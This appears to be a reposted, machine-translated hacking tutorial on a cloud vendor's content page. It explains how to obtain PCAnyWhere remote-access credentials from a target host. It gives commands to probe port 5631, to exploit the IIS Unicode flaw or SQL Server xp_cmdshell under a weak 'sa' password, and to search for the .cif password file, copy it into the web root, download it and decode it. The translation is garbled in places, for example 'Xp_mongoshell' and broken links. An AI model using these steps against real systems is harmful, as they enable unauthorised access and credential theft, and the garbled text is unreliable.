Crack the password for a remote connection to PCAnyWhere

Source: Internet
Author: User
Tags pcanywhere

Comments: NT machines generally use PCAnyWhere for remote management. Win2K machines generally use terminals for remote management. Therefore, if you can obtain the account and password for remote connection to PCAnyWhere, then you can remotely connect to the host. The key to the problem is to obtain the PCAnyWhere password file (*. CIF), and then use the PCanyWhere password viewing tool. Because NT machines generally use PCAnyWhere for remote management, Win2K machines generally use terminals for remote management, therefore, if you can obtain the PCAnyWhere remote connection account and password, you can remotely connect to the host.

The key to the problem is to obtain the PCAnyWhere password file (*. CIF), and then use the PCanyWhere password viewing tool.

Http://www.csdn.net/soft/openfile.asp? Kind = 2 & id = 7824) to get the account and password.

The PCAnyWhere Server uses port 5631. You can use:

Telnet 10.10.10.10 5631

Determine whether the remote host's PCAnyWhere Server is enabled.

The following two methods are used to obtain the PCAnyWhere password file:

Method 1: Use the Unicode vulnerability PCanyWhere password viewing tool

The following uses the Unicode tool to demonstrate how to use the Unicode vulnerability to obtain the PCAnyWhere password file (*. CIF ).

Download tool:

Pcanywhere9.2: http://www.symantec.com/

The downloaded Pcanywhere9.2 has a validity period,

The procedure is as follows:

Find the *. CIF file on the host.

Copy the file to the website directory.

Use IE to download the file.

Use PcanywherePWD to obtain the user name and password.

Connect to log on.



Procedure:

Find the *. CIF file on the host

Run the dir c:/*. cif/s command:

Generally, Citempl. cif is the default password file. Therefore, we need the SA. CIF file.

Copy the file to the website directory.

To find the file: Use the command

Dir c:/Tscontent.gif/s

After you know the directory, for example, c:/inetpub/wwwroot/

Directory of the password file: c:/Program Files/pcANYWHERE/DATA

Run the Copy command below:

1 file (s) copied indicates that the copy is successful.

Use IE to download this file

Use http: // 1.1.1.1/sa. cif to download the file.

Use the PCanyWhere password viewing tool to get the user name and password

Remote connection

Method 2: Use SQLServer PCanyWhere password to view the tool

Because the Sa password of some websites is generally null or Sa, it may be the same as the domain name. If you remotely connect to the database of the host, you can also obtain the password file:

The method is as follows:

Use: XP_Cmdshell 'dir c:/*. cif/s'

Find the password file and copy it to the website directory:

Xp_mongoshell 'Copy c:/pcanywhere/sa. cif

C:/inetpub/wwwroot'

Download and get the user name and password.

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.